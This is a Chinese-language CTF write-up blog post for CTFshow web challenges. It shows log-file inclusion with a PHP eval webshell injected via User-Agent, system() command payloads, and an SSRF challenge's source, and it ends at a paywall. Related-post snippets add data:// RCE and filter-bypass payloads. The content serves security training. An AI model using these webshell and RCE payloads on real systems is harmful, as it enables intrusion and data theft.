CTFshow web AK赛wp

最新推荐文章于 2022-02-25 23:20:08 发布
最新推荐文章于 2022-02-25 23:20:08 发布
阅读量636 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54515836/article/details/113178259

CTFshow WEB AK赛

ak赛 wp

签到_观己

打开后的页面正则匹配过滤了php,且大小写不敏感,后面又有include函数,已经是对php的伪协议的一个考点。
php被过滤,我们可以用data://伪协议
发现allow_url_include没有开启,还得另寻他法。做题的时候没想到有日志包含,还是题做得太少了。

payload:file=/var/log/nginx/access.log

在这里插入图片描述通过将一句话木马写入到UA中

<?php eval($_POST[cmd])?>

在这里插入图片描述
执行一句话即可得到flag

payload:cmd=system('ls /');

在这里插入图片描述

payload:cmd=system('cat flag.txt');

在这里插入图片描述

web1_观字

<?php

#flag in http://192.168.7.68/flag
if(isset($_GET['url'])){
   
   
    $url = $_GET['url'];
    $protocol = substr($url, 0,7);
    if($protocol!='http://'){
   
   
        die('仅限http协议访问');
    }
    if(preg_match('/\.|\;|\||\<|\>|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\{|\}|\!|\&|\$|0/', $url)){
   
   
        die('仅限域名地址访问');
    }
    system('curl '.$url);<
最低0.47元/天 解锁文章

200万优质内容无限畅学
[CTFSHOW]WEBAK
Y4tacker的博客
11-01 3576
文章目录签到_观己web1_观字参考文章 前言:希望自己能一天天逐渐的改变 签到_观己 首先我尝试了一波data伪协议发现被禁止了,想了半天结果忘记了日志包含了害file=/var/log/nginx/access.log 尝试在UA中放入一句话木马 芜湖,起飞! system("ls /"); 结束 web1_观字 代码审计,题目的意思是想我们通过curl http://192.168.7.68/flag的回显得到flag,但是.被过滤了,然后我想到了把ip转换为数字,192.168.1.100
CTFshow 击剑 部分WP
Nancy523的博客
11-13 4732
摆烂了摆烂了 太难了 聪明的师傅已经组队打起月了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录1.Misc中文识别带师2.Web简单的验证码easyPOP3.Pwnpwn01-My_sword_is_readypwn02-Precision_and_grace4.Osint英语阅读这是哪里卡鲁铁盒人家想玩嘛人有点多小城美食安装arph5.热身听歌识曲看图识妹进群得码 1.Misc 麻麻的 只会一题 其他的等复现再补充吧 中文识别带师 挺好玩一个题 格局打开 linux nc进环境(注意进
CTFSHOW web_AK
yao_xin_de_yuan的博客
07-31 554
CTFSHOW web_AK 签到——观己 文件包含漏洞 php伪协议 看源码过滤了php,开始想的是php伪协议,但是试了一下allow_url_include=off,data://用不了。最后尝试了一下直接读/flag,/flag.txt。发现在/flag.txt直接读出了flag. 日志包含 传?file=/var/log/nginx/access.log过去发现nginx访问日志可以访问。 写一句话<? eval($_POST['hack']);?>到UA里面,go。 使用蚁剑
ctfshow-WEB AK-签到_观己
博客地址 www.sec0nd.top
02-25 2611
文章目录题目分析解题过程 题目分析 打开网页 正则匹配过滤了php,且大小写不敏感 allow_url_include没有开启没有办法用伪协议,应该是利用日志包含解题 解题过程 ?file=/var/log/nginx/access.log 发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话 在UA中添加一句话木马 <?php eval($_POST[1]);?> 在POST中令1=system('ls /');查看根目录中的文件 发现有个flag.txt 这里应该就是fl
CTFshow web-web3 WP
qq_45427131的博客
05-11 775
CTFshow Web-Web3 文件包含+命令执行(伪协议) Php://filter/read=convert.base64-encode/resource=文件名 用php伪协议读取经过base64加密之后的文件 php://input php://input可以访问请求的原始数据的只读流,将请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。 注:当enctype=”multipa
Ctfshow web-web7 WP
qq_45427131的博客
05-12 498
首先讲一下数据库的判断 基础知识: select ascii(substr(database(),1,1))=119 ; 上面这段话的意思,可以分布理解 1、 首先是ascii()函数 , 熟悉mysql的应该知道,这是查询字符ascii码的 2、A的ascii码是65 a的ascii码是97 3、Substr()的函数作用是截取,有点类似于limit的作用 Substr(需要截取的字符串,开始位置,截取长度) 4、举个例子,当前我选中mysql数据库,尝试用select substr
ctfshow web web ak观心
最新发布
09-11
CTFShowWeb AK中,观心考点的payload可以参考以下内容。引用[1]提供了一系列关于Web AK观心考点的思路payload。引用中给出了一个源码示例,其中对传入的文件参数进行了校验。如果传入的文件名中包含"php"这个...
ctfshow web web ak
09-11
根据引用的代码,它包含了一些加密和解密操作,并根据GET参数中的image值来查找文件并显示图像。...结合这些信息,我无法直接确定ctfshow web web ak的含义。请提供更多相关信息以便我更好地帮助您。
CtfShow web-web5 WP
qq_45427131的博客
05-11 252
首先看到的是代码 代码中打红框的一段是要重点关注的 1、 GET方式,分别将收到的v1 v2 赋值给v1 v2 2、 If判断 isset判断是都有值,变量是否设置值 3、 第二个if是判断v1的值是不是md5,ctype_alpha 判断变量是不是有英文字母,因为md5肯定是有英文字母的 4、 第三个if是判断v2的值是不是纯数字 5、 第四个if用于判断v1的值是不是等于v2 ,在md5中0e开头的值,默认是相等的,v1是字符 v2是数字,可以理解成md5碰撞 举个例子 QNKCDZO 和 24061
CTFShow-WEB入门-信息收集 WP
PP Jun的博客
08-09 603
文章目录web1web2web3web4web5web6web7web8web9web10web11web12web13web14web15web16web17web18web19web20 web1 直接查看源码 web2 直接在url前加:view-source 或 ctrl+u web3 抓包,查看响应头 web4 1.在url后添加/robots.txt 2.访问/flagishere.txt web5 1.在url后添加/index.phps 结果:下载一个文件 2.将文件后缀改为tx
Ctfshow web入门-web35-36 WP
qq_45427131的博客
05-17 466
web35 分析源码 发现对括号进行过滤,那么只能使用不带括号的函数,include $_POST[a]进行文件包含,看到能文件包含之后,可以尝试使用data协议命令执行,虽然data协议的命令执行写过很多遍了,但是还是再要提一下data:text/plain,<?php system("命令");?> 构造 payload: ?c=include%a$_POST[a]?> POST:a=data:text/plain,<?php system('tac fla*');?&gt
Ctfshow web入门-web43 WP
qq_45427131的博客
05-18 593
web43 查看原码: preg_match 过滤了cat指令,cat指令可以用nl tac等等代替 然后system()函数就是常规的命令执行,将输入的变量写入黑洞,这种情况老套路直接双写就可以了 关于双写:怕还是有小伙伴不懂,看不懂的小伙伴请看下表 2>/dev/null 意思就是把错误输出到“黑洞” >/dev/null 2>&1 默认情况是1,也就是等同于1>/dev/null 2>&1。意思就是把标准输出重定向到“黑洞”,还把错误输出
ctfshow-web入门-其他分类(部分wp)-396-403
yutianovo的博客
01-16 692
396 传入 ?url=s;cat ls -al > 1.txt 得到 flag 位置 total 24 drwxrwxrwx 1 www-data www-data 4096 Jan 16 06:31 . drwxr-xr-x 1 root root 4096 Oct 31 2019 .. -rw-r--r-- 1 www-data www-data 0 Jan 16 06:31 1.txt -rw-r--r-- 1 w
Ctfshow web入门-web34 WP
qq_45427131的博客
05-17 389
web34的套路和web33一样,解题姿势也一样,当然也可以换一种解法,比如说日志包含、文件包含、data协议命令执行 日志包含解法: 首先查看preg_match函数过滤的参数 还是老套路,过滤括号,那么只能用不带括号的函数include了,include $_POST[a] 分号被过滤之后可以用?>代替 尝试包含日志 日志包含成功,接下来就是往日志写马了 用firefox访问然后burpsuite抓包,然后再user-agent里面输入一句话木马<?php eval($_POST[a])
Ctfshow web入门-web37 WP
qq_45427131的博客
05-18 563
首先查看源代码 代码的意思是文件包含获取到的变量c的值,但是对变量c又有过滤,要求获取到的c中不包含flag 这个地方可以用data协议rce data协议: text/plain,<?php system(‘命令’);?> 构造payload : http://1332de51-f763-40f4-b931-c2ffaac051e5.challenge.ctf.show:8080/?c=data:text/plain,<?php system('ls');?> 查看当前目录
ctfshow-Web入门-1~10wp
yutianovo的博客
09-03 1332
Web1 右键 查看源码得到flag Web2 使用查看源码的快捷键 Ctrl+U 或者 view-source:http://网站/ Web3 响应头获取flag Web4 访问 robots.txt 得到 flag详细目录 访问即可获得flag Web5 访问 index.phps 得到源码,就能看到flag Web6 访问 www.zip 得到压缩包 看到注释 flag in fl000g.txt 压缩包中是没有flag的 在网页中访问 fl000g.txt 就能得到 Web7 访问 .g.
ctfshow web40-web60系统命令执行 wp
qq_56158055的博客
01-13 569
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web40 源码 发现过滤了所有数字,以及大部分的字符,但仔细观察可以发现,括号是中文的括号,因此我们可以利用这点,来进行无参RCE 可以利用p神的无参数RCE来做,利用localeconv()函数来做,也可以用异或和取反来做。 我这边用的是get_defined_vars()函数。 get_defined_vars():返回由所有已定义变量所组成的数组 因此我们可以 发现一堆乱七八糟的 利用
Ctfshow web入门-命令执行web47-50 WP
qq_45427131的博客
05-20 494
查看源码发现又是熟悉的黑洞,这题过滤了的参数都可以用以下几个代替 tac 代替 cat < 代替 空格 ‘’分隔 代替 * 能代替的新命令 被过滤的命令 tac cat < 空格 “” * 注意:<不能和?连在一起用 构造payload: ?c=tac<fla''g.php%26%26ls web48 按照上一题的逻辑,查看有没有我们需要用到的参数被过滤了… 仔细分析下来之后发现没有参数被过滤,这个时候就可以复制上一题的payload到本题执行.
ctfshow nodejs wp
yink12138的博客
01-12 474
ctfshow nodejs部分的wp
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HoAd's blog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值